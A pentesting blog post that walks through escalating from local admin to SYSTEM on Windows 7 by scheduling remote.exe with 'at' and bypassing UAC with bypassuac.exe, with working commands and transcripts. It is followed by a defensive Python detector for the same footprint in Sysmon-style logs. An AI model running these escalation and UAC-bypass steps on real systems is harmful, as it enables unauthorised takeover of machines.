Admin to SYSTEM win7 with remote.exe

So I ran across this little gem from 2008!

http://blogs.technet.com/b/askds/archive/2008/10/22/getting-a-cmd-prompt-as-system-in-windows-vista-and-windows-server-2008.aspx

I ended up using Method 2 on a recent test. The post above calls for an elevated command shell so you can call “at”. This is easy if you are legitimately sitting in front of the box, but if you are pentesting, it is potentially harder.

Three scenarios:

  • user is a regular user and can't UAC to let you run admin commands
  • user is local admin and UAC is disabled
  • user is local admin but you have to bypass UAC

Easiest way when sitting on a command shell is probably just to type “at”.

ohh man, denied 😦


yay!

Scenario 1, you're screwed, gonna have to solve the not-admin problem first.

anger!

Scenario 2, no UAC…just follow the linked blog post. Get a copy of remote.exe (x86 or x64, matching the architecture of the system you want to run it on) and run the following command:

AT #TIME_TO_RUN c:\pathto\remote.exe /s cmd SYSCMD

Once it runs, connect to the debugger you started (it is running with SYSTEM privs):

C:\path\REMOTE.EXE /c SYSTEM_NAME SYSCMD

You should see something like this:

C:\pathto\>remotex64.exe /c WPAD SYSCMD
**************************************
***********     REMOTE    ************
***********     CLIENT    ************
**************************************
Connected…

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>
**Remote: Connected to WPAD CG [Fri 4:23 PM]

C:\Windows\system32>whoami
whoami
nt authority\system

weeeeeeeeeeeeeeeeeeee!

Scenario 3, you can use bypassuac to get around our UAC issues.

Get bypassuac on your system, then run it like so:

C:\pathto\>at
Access is denied.

C:\pathto\>bypassuac.exe
Too few arguments
Incorrect input. Please find samples below.
Note, ‘elevate stuff’ will be executed in the elevated shell as ‘cmd.exe stuff’

elevate /c
elevate /c [arg1] [arg2] .. [argn]
elevate –pid 1234 /c [arg1] [arg2] .. [argn]
elevate /c c:\path\foo.exe [arg1] [arg2] .. [argn]
elevate –pid 1234 /c c:\path\foo.exe [arg1] [arg2] .. [argn]

C:\pathto\>bypassuac.exe /c at 16:32 C:\pathtop\remotex64.exe /s cmd SYSCMD
Added a new job with job ID = 31

C:\pathto\>at
Access is denied.

Don't worry, it worked 🙂

C:\pathto\>remotex64.exe /c WPAD SYSCMD
**************************************
***********     REMOTE    ************
***********     CLIENT    ************
**************************************
Connected…

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>
**Remote: Connected to WPAD CG [Fri 4:32 PM]

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>
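From the defender's side, both scenarios above leave the same footprint: an at.exe invocation whose arguments name remote.exe, followed by the Task Scheduler engine launching remote.exe in server mode (/s) as NT AUTHORITY\SYSTEM, and finally a client (/c) attaching to the named pipe. The following is an added example, not code from the original post or from Microsoft's remote.exe; it assumes process-creation records shaped like Sysmon Event ID 1 fields (Image, CommandLine, User, ParentImage), and the sample events, the WPAD host name and the C:\pathto paths are constructed to mirror the transcript above, not captured logs.

```python
"""Flag remote.exe being scheduled via at.exe and run in server mode as SYSTEM.

Added example (not part of the original post). Assumes Sysmon-style
process-creation records with Image, CommandLine, User and ParentImage.
"""
import ntpath

# Constructed sample events (not real logs) modelled on the post's transcript.
SAMPLE_EVENTS = [
    # 1. at.exe scheduling remote.exe in server mode ("AT 16:32 ... /s cmd SYSCMD")
    {"Image": r"C:\Windows\System32\at.exe",
     "CommandLine": r"at 16:32 C:\pathto\remotex64.exe /s cmd SYSCMD",
     "User": r"WPAD\user", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # 2. the job firing: Task Scheduler engine launches remote.exe as SYSTEM
    {"Image": r"C:\pathto\remotex64.exe",
     "CommandLine": r"C:\pathto\remotex64.exe /s cmd SYSCMD",
     "User": r"NT AUTHORITY\SYSTEM", "ParentImage": r"C:\Windows\System32\taskeng.exe"},
    # 3. the client attaching to the pipe ("remotex64.exe /c WPAD SYSCMD")
    {"Image": r"C:\pathto\remotex64.exe",
     "CommandLine": r"remotex64.exe /c WPAD SYSCMD",
     "User": r"WPAD\user", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # 4. benign noise that must not match
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe",
     "User": r"WPAD\user", "ParentImage": r"C:\Windows\explorer.exe"},
]

# Parents under which an at.exe / scheduled job is expected to start its payload.
SCHEDULER_PARENTS = {"taskeng.exe", "svchost.exe", "at.exe"}


def _base(path):
    """Lower-cased file name of a Windows path (ntpath handles backslashes anywhere)."""
    return ntpath.basename(path).lower()


def _is_remote_exe(name):
    """Debugging Tools ship remote.exe / remotex64.exe; match that family by name."""
    return name.startswith("remote") and name.endswith(".exe")


def classify(ev):
    """Return a rule label for one event, or None if it is not of interest."""
    image = _base(ev["Image"])
    parent = _base(ev["ParentImage"])
    args = ev["CommandLine"].lower().split()
    user = ev["User"].lower()

    # Rule 1: at.exe given a remote.exe binary to schedule (the scheduling step).
    if image == "at.exe" and any(_is_remote_exe(_base(a)) for a in args):
        return "at-schedules-remote"

    # Rule 2: remote.exe in server mode; highest confidence when it is SYSTEM
    # and was started by the scheduler rather than an interactive shell.
    if _is_remote_exe(image) and "/s" in args:
        if user.endswith("\\system") and parent in SCHEDULER_PARENTS:
            return "remote-server-as-system"
        return "remote-server"

    # Rule 3: a client attaching to a remote.exe pipe (weak signal on its own).
    if _is_remote_exe(image) and "/c" in args:
        return "remote-client"
    return None


def scan(events):
    """Run classify() over a list of events and return (label, command line) hits."""
    hits = []
    for ev in events:
        label = classify(ev)
        if label:
            hits.append((label, ev["CommandLine"]))
    return hits


if __name__ == "__main__":
    for label, cmdline in scan(SAMPLE_EVENTS):
        print(f"{label:24} {cmdline}")
```

The "remote-server-as-system" hit is the one worth alerting on by itself: remote.exe exists for debugging, but a copy of it running under taskeng.exe as SYSTEM with cmd as the child is exactly the pipe-backed shell this post builds. The at.exe and client hits are mostly useful for correlation, and on a Windows 7 box the command line is only in the record if you are collecting it with Sysmon or an equivalent, which is why this example assumes that record shape.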
